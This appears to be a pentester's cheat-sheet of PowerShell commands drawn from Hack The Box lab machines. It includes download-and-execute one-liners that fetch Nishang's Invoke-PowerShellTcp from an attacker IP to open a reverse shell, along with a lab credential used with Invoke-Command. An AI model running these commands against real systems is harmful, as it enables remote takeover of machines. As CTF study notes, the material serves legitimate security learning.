Powershell Modules
Post

Powershell Modules

Nishang

If we want to add a .ps1 file into a Windows machine such as the Nishang series we can modify the latest line of such file (to load the script and then execute it):

1
2
3
4
5
6
        Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
        Write-Error $_
    }
}

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.4 -Port 1234

Then we can execute it by using the following command on the compromised machine:

1
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.4/Invoke-PowerShellTcp.ps1')

Examples: [[Anubis#^bcdb9e]]

Invoke-Command

Module to execute commands on the specified machine:

1
2
3
PS> $Password = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
PS> $Creds = New-Object System.Management.Automation.PSCredential('timelapse.htb\svc_deploy', $Password)
*PS> Invoke-Command -ComputerName dc01 -Credential $Creds -ScriptBlock { whoami }

Examples: Fulcrum

Get-SMBShare

Retrieves the local shares:

1
2
3
4
5
6
7
PS C:\Users\BTables\Desktop> Get-SMBShare

Name   ScopeName Path Description  
----   --------- ---- -----------  
ADMIN$ *              Remote Admin 
C$     *              Default share
IPC$   *              Remote IPC

Examples: Fulcrum

Select-String (Search String Pattern)

Search files on the system

1
2
PS X:\fulcrum.local\scripts> Select-String -Path "X:\fulcrum.local\scripts\*.ps1" -Pattern Administrator
PS X:\fulcrum.local\scripts> Select-String -Path "X:\fulcrum.local\scripts\*.ps1" -Pattern 923a

Example: Fulcrum

AD CS

TODO [[Anubis]]

Invoke-PowerShellTCP

In order to connect to get a reverse shell with powershell we can abuse of the Invoke-PowerShellTCP.ps1 all we need to do is modify the very bottom of this .ps1 file as follows:

1
2
3
4
5
6
7
8
9
10
# Invoke-PowerShellTCP.ps1
------------------------SNIP---------------------------
    catch
    {
        Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
        Write-Error $_
    }
}

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.2 -Port 443 -Rows 37 -Cols 189

To get the file in rows and columns of the screen we can execute the stty size on our attacker machine.

Then from the shell we get, we only need need to execute the followin powershell command:

1
powershell.exe IEX(New-Object Net.WebClient).downloadString('http://10.10.16.2/Invoke-PowerShellTcp.ps1')"

Don’t forget to open your listener with netcat locally.

Examples: Streamio [[Anubis]]